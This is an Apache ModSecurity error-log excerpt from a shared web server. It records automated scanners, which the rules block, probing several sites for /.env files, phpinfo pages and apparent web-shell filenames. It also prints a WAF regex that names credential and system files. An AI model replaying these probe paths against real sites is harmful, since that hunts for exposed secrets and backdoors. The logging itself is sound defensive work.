[Tue May 26 16:29:37.795036 2026] [security2:error] [pid 808625:tid 808831] [client 92.118.39.194:5304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/cloud/.env"] [unique_id "ahV9GTEl_SBaWibfDmpD9QAAAEw"]
[Tue May 26 16:29:38.188018 2026] [security2:error] [pid 808625:tid 808847] [client 40.83.92.30:6096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/file3.php"] [unique_id "ahV9GjEl_SBaWibfDmpD_AAAAFw"]
[Tue May 26 16:29:38.188127 2026] [security2:error] [pid 808625:tid 808847] [client 40.83.92.30:6096] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/file3.php"] [unique_id "ahV9GjEl_SBaWibfDmpD_AAAAFw"]
[Tue May 26 16:29:38.242513 2026] [security2:error] [pid 808625:tid 808852] [client 92.118.39.194:18450] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/blogs/.env"] [unique_id "ahV9GjEl_SBaWibfDmpD_wAAAGE"]
[Tue May 26 16:29:38.252572 2026] [security2:error] [pid 808625:tid 808866] [client 92.118.39.194:5456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/engine/.env"] [unique_id "ahV9GjEl_SBaWibfDmpEAAAAAG8"]
[Tue May 26 16:29:38.274662 2026] [security2:error] [pid 808625:tid 808837] [client 92.118.39.194:5458] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/forum/.env"] [unique_id "ahV9GjEl_SBaWibfDmpEAQAAAFI"]
[Tue May 26 16:29:38.487357 2026] [security2:error] [pid 808625:tid 808835] [client 92.118.39.194:5474] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/forums/.env"] [unique_id "ahV9GjEl_SBaWibfDmpECAAAAFA"]
[Tue May 26 16:29:38.833373 2026] [security2:error] [pid 808625:tid 808784] [client 40.83.92.30:6110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-mail.php"] [unique_id "ahV9GjEl_SBaWibfDmpEFQAAAB0"]
[Tue May 26 16:29:38.833498 2026] [security2:error] [pid 808625:tid 808784] [client 40.83.92.30:6110] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/wp-mail.php"] [unique_id "ahV9GjEl_SBaWibfDmpEFQAAAB0"]
[Tue May 26 16:29:39.209523 2026] [security2:error] [pid 808625:tid 808861] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9GjEl_SBaWibfDmpEDwAAAGo"]
[Tue May 26 16:29:39.455903 2026] [security2:error] [pid 808625:tid 808773] [client 40.83.92.30:6130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/about.php"] [unique_id "ahV9GzEl_SBaWibfDmpEIQAAABI"]
[Tue May 26 16:29:39.456031 2026] [security2:error] [pid 808625:tid 808773] [client 40.83.92.30:6130] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/about.php"] [unique_id "ahV9GzEl_SBaWibfDmpEIQAAABI"]
[Tue May 26 16:29:39.521544 2026] [security2:error] [pid 808625:tid 808790] [client 92.118.39.194:5304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/store/.env"] [unique_id "ahV9GzEl_SBaWibfDmpEIgAAACM"]
[Tue May 26 16:29:39.643227 2026] [security2:error] [pid 808625:tid 808854] [client 92.118.39.194:5360] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/shop/.env"] [unique_id "ahV9GzEl_SBaWibfDmpELAAAAGM"]
[Tue May 26 16:29:39.644394 2026] [security2:error] [pid 808625:tid 808761] [client 176.65.139.236:31040] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consultrgb.moes-art.com"] [uri "/.env"] [unique_id "ahV9GzEl_SBaWibfDmpELQAAAAY"]
[Tue May 26 16:29:39.957537 2026] [security2:error] [pid 808625:tid 808799] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9GzEl_SBaWibfDmpEJQAAACw"]
[Tue May 26 16:29:40.149911 2026] [security2:error] [pid 808625:tid 808843] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9HDEl_SBaWibfDmpENQAAAFg"]
[Tue May 26 16:29:40.260409 2026] [security2:error] [pid 808625:tid 808835] [client 92.118.39.194:5474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 194.39.118.92.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/info.php"] [unique_id "ahV9HDEl_SBaWibfDmpEPAAAAFA"]
[Tue May 26 16:29:40.337042 2026] [security2:error] [pid 808625:tid 808789] [client 40.83.92.30:6102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp.php"] [unique_id "ahV9HDEl_SBaWibfDmpEPgAAACI"]
[Tue May 26 16:29:40.337126 2026] [security2:error] [pid 808625:tid 808789] [client 40.83.92.30:6102] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/wp.php"] [unique_id "ahV9HDEl_SBaWibfDmpEPgAAACI"]
[Tue May 26 16:29:41.063179 2026] [security2:error] [pid 808625:tid 808805] [client 40.83.92.30:5764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/.dj/index.php"] [unique_id "ahV9HTEl_SBaWibfDmpETAAAADI"]
[Tue May 26 16:29:41.063277 2026] [security2:error] [pid 808625:tid 808805] [client 40.83.92.30:5764] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/.dj/index.php"] [unique_id "ahV9HTEl_SBaWibfDmpETAAAADI"]
[Tue May 26 16:29:41.586492 2026] [security2:error] [pid 808625:tid 808773] [client 40.83.92.30:6143] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/adminfuns.php"] [unique_id "ahV9HTEl_SBaWibfDmpEVgAAABI"]
[Tue May 26 16:29:41.586590 2026] [security2:error] [pid 808625:tid 808773] [client 40.83.92.30:6143] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/adminfuns.php"] [unique_id "ahV9HTEl_SBaWibfDmpEVgAAABI"]
[Tue May 26 16:29:41.953995 2026] [security2:error] [pid 808625:tid 808829] [client 92.118.39.194:18444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 194.39.118.92.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/php_info.php"] [unique_id "ahV9HTEl_SBaWibfDmpEXQAAAEo"]
[Tue May 26 16:29:42.283557 2026] [security2:error] [pid 808625:tid 808846] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9HTEl_SBaWibfDmpEWQAAAFs"]
[Tue May 26 16:29:42.313311 2026] [security2:error] [pid 808625:tid 808836] [client 40.83.92.30:6132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/php8.php"] [unique_id "ahV9HjEl_SBaWibfDmpEZQAAAFE"]
[Tue May 26 16:29:42.313463 2026] [security2:error] [pid 808625:tid 808836] [client 40.83.92.30:6132] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/php8.php"] [unique_id "ahV9HjEl_SBaWibfDmpEZQAAAFE"]
[Tue May 26 16:29:42.356199 2026] [security2:error] [pid 808625:tid 808817] [client 92.118.39.194:18438] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9HjEl_SBaWibfDmpEZAAAAD4"]
[Tue May 26 16:29:43.005212 2026] [security2:error] [pid 808625:tid 808802] [client 40.83.92.30:6089] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/classwithtostring.php"] [unique_id "ahV9HzEl_SBaWibfDmpEbAAAAC8"]
[Tue May 26 16:29:43.005327 2026] [security2:error] [pid 808625:tid 808802] [client 40.83.92.30:6089] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/classwithtostring.php"] [unique_id "ahV9HzEl_SBaWibfDmpEbAAAAC8"]
[Tue May 26 16:29:43.557110 2026] [security2:error] [pid 808625:tid 808850] [client 40.83.92.30:6111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/info.php"] [unique_id "ahV9HzEl_SBaWibfDmpEfAAAAF8"]
[Tue May 26 16:29:43.557211 2026] [security2:error] [pid 808625:tid 808850] [client 40.83.92.30:6111] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/info.php"] [unique_id "ahV9HzEl_SBaWibfDmpEfAAAAF8"]
[Tue May 26 16:29:44.416937 2026] [security2:error] [pid 808625:tid 808869] [client 40.83.92.30:6105] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/ioxi-o.php"] [unique_id "ahV9IDEl_SBaWibfDmpElQAAAHI"]
[Tue May 26 16:29:44.417048 2026] [security2:error] [pid 808625:tid 808869] [client 40.83.92.30:6105] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/ioxi-o.php"] [unique_id "ahV9IDEl_SBaWibfDmpElQAAAHI"]
[Tue May 26 16:29:44.549742 2026] [security2:error] [pid 808625:tid 808790] [client 14.167.166.241:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9IDEl_SBaWibfDmpEiAAAACM"]
[Tue May 26 16:29:44.698284 2026] [security2:error] [pid 808625:tid 808756] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9IDEl_SBaWibfDmpEiwAAAAE"]
[Tue May 26 16:29:45.563252 2026] [security2:error] [pid 808625:tid 808859] [client 92.118.39.194:18496] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9ITEl_SBaWibfDmpEoAAAAGg"]
[Tue May 26 16:29:45.660784 2026] [security2:error] [pid 808625:tid 808871] [client 92.118.39.194:18482] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9ITEl_SBaWibfDmpEpAAAAHQ"]
[Tue May 26 16:29:46.057883 2026] [security2:error] [pid 808625:tid 808875] [client 92.118.39.194:18530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 194.39.118.92.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/php-info.php"] [unique_id "ahV9IjEl_SBaWibfDmpEsQAAAHg"]
[Tue May 26 16:29:46.815606 2026] [security2:error] [pid 808625:tid 808855] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9IjEl_SBaWibfDmpEtwAAAGQ"]
[Tue May 26 16:29:47.924780 2026] [security2:error] [pid 808625:tid 808791] [client 92.118.39.194:18586] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9IzEl_SBaWibfDmpE1gAAACQ"]
[Tue May 26 16:29:47.962205 2026] [security2:error] [pid 808625:tid 808781] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9IzEl_SBaWibfDmpE0gAAABo"]
[Tue May 26 16:29:48.949646 2026] [security2:error] [pid 808625:tid 808762] [client 40.83.92.30:5782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/011i.php"] [unique_id "ahV9JDEl_SBaWibfDmpE5wAAAAc"]
[Tue May 26 16:29:48.949811 2026] [security2:error] [pid 808625:tid 808762] [client 40.83.92.30:5782] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/011i.php"] [unique_id "ahV9JDEl_SBaWibfDmpE5wAAAAc"]
[Tue May 26 16:29:49.757868 2026] [security2:error] [pid 808625:tid 808853] [client 40.83.92.30:6113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/edit.php"] [unique_id "ahV9JTEl_SBaWibfDmpE_QAAAGI"]
[Tue May 26 16:29:49.758008 2026] [security2:error] [pid 808625:tid 808853] [client 40.83.92.30:6113] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/edit.php"] [unique_id "ahV9JTEl_SBaWibfDmpE_QAAAGI"]
[Tue May 26 16:29:50.406551 2026] [security2:error] [pid 808625:tid 808760] [client 40.83.92.30:6133] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/sid3.php"] [unique_id "ahV9JjEl_SBaWibfDmpFCgAAAAU"]
[Tue May 26 16:29:50.406745 2026] [security2:error] [pid 808625:tid 808760] [client 40.83.92.30:6133] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/sid3.php"] [unique_id "ahV9JjEl_SBaWibfDmpFCgAAAAU"]
[Tue May 26 16:29:50.676685 2026] [security2:error] [pid 808625:tid 808796] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9JTEl_SBaWibfDmpE-QAAACk"]
[Tue May 26 16:29:50.814038 2026] [security2:error] [pid 808625:tid 808715] [remote 74.7.241.15:49348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lodgerajasabai212.svijaykumar.in"] [uri "/l212-members-founding.php"] [unique_id "ahV9JjEl_SBaWibfDmpFEQAAGlk"], referer: https://www.lodgerajasabai212.svijaykumar.in/
[Tue May 26 16:29:51.014245 2026] [security2:error] [pid 808625:tid 808772] [client 40.83.92.30:6136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/load.php"] [unique_id "ahV9JzEl_SBaWibfDmpFEgAAABE"]
[Tue May 26 16:29:51.014380 2026] [security2:error] [pid 808625:tid 808772] [client 40.83.92.30:6136] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/load.php"] [unique_id "ahV9JzEl_SBaWibfDmpFEgAAABE"]
[Tue May 26 16:29:51.578058 2026] [security2:error] [pid 808625:tid 808770] [client 40.83.92.30:6115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/166.php"] [unique_id "ahV9JzEl_SBaWibfDmpFIwAAAA8"]
[Tue May 26 16:29:51.578170 2026] [security2:error] [pid 808625:tid 808770] [client 40.83.92.30:6115] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/166.php"] [unique_id "ahV9JzEl_SBaWibfDmpFIwAAAA8"]
[Tue May 26 16:29:51.579693 2026] [security2:error] [pid 808625:tid 808861] [client 92.118.39.194:41804] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9JzEl_SBaWibfDmpFIgAAAGo"]
[Tue May 26 16:29:52.269771 2026] [security2:error] [pid 808625:tid 808830] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9KDEl_SBaWibfDmpFNwAAAEs"]
[Tue May 26 16:29:52.315757 2026] [security2:error] [pid 808625:tid 808855] [client 40.83.92.30:6092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/load.php"] [unique_id "ahV9KDEl_SBaWibfDmpFPwAAAGQ"]
[Tue May 26 16:29:52.315893 2026] [security2:error] [pid 808625:tid 808855] [client 40.83.92.30:6092] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "afstpaul.org"] [uri "/load.php"] [unique_id "ahV9KDEl_SBaWibfDmpFPwAAAGQ"]
[Tue May 26 16:29:52.357835 2026] [autoindex:error] [pid 808625:tid 808864] [client 45.148.10.204:58270] AH01276: Cannot serve directory /home2/restmwhm/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:29:52.883395 2026] [security2:error] [pid 808625:tid 808804] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9KDEl_SBaWibfDmpFMwAAADE"]
